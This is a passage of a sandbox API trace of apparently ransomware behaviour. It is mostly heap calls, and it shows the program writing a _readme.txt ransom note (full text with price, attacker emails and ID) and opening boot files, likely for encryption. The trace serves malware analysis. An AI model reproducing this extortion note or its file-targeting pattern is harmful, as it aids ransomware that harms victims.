0x325c3b0 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.006] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0228.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.006] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.007] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.007] PathFindFileNameW (pszPath="") returned="" [0228.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.007] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.007] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.007] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.008] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.008] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0228.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.008] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0228.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.008] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.008] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.008] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.008] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.009] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.009] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.009] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0228.009] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0228.009] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.009] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.009] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.010] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 